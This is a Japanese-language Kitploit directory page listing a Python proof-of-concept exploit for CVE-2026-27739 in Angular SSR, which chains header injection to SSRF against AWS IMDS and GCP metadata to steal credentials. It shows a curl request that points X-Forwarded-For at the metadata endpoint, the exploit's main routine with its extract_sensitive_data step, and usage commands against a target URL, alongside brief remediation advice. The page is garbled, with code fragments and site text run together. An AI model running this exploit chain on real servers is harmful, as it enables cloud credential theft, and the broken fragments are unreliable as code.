Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-27739-POC — Angular SSRにおけるCVE-2026-27739を悪用するPython PoC:プロトタイプ汚染によるヘッダーインジェクションと、認証情報窃取のためのAWS IMDS/GCPメタデータへのSSRFチェーン。 | Kitploit
ツール/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテストAPIセキュリティ
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Angular SSRにおけるCVE-2026-27739を悪用するPython PoC:プロトタイプ汚染によるヘッダーインジェクションと、認証情報窃取のためのAWS IMDS/GCPメタデータへのSSRFチェーン。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. プロトタイプ汚染によるヘッダーインジェクション (CVSS: 7.5)

説明: Angular SSR がプロトタイプチェーンに影響を与える安全でないクエリパラメータを処理する 影響: リクエストヘッダーの操作、SSRF チェーン攻撃の可能性

修復方法

  1. X-Forwarded-* ヘッダーの処理を削除/無効化するか、既知のプロキシをホワイトリスト化する
  2. SSRF の脆弱性が生じやすい操作の前に厳格な URL 検証を実装する
  3. ヘッダーのサニタイズに express-validator などを使用する
  4. AWS/GCP のメタデータエンドポイントを無効化するか、ホップリミット付きの IMDSv2 を使用する """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() 使用方法 bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify 仕組み ヘッダーインジェクションテスト: Angular SSR が安全でない方法で処理する可能性のあるプロトタイプ汚染ペイロードと安全でない転送ヘッダーを送信する SSRF チェーン: X-Forwarded-For/X-Original-URL を介して AWS IMDS、GCP メタデータ、localhost サービスへのアクセスをテストする IMDSv2 トークン抽出: SSRF を連鎖させて AWS メタデータトークンを窃取し、その後 IAM 認証情報を取得する 自動レポート: PoC を含む CVSS スコア付きペネトレーションテストレポートを生成する 技術的詳細 根本原因: Angular Universal SSR アプリは、サニタイズせずに req.headers を内部 API に直接転送することが多い:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

ツールをダウンロード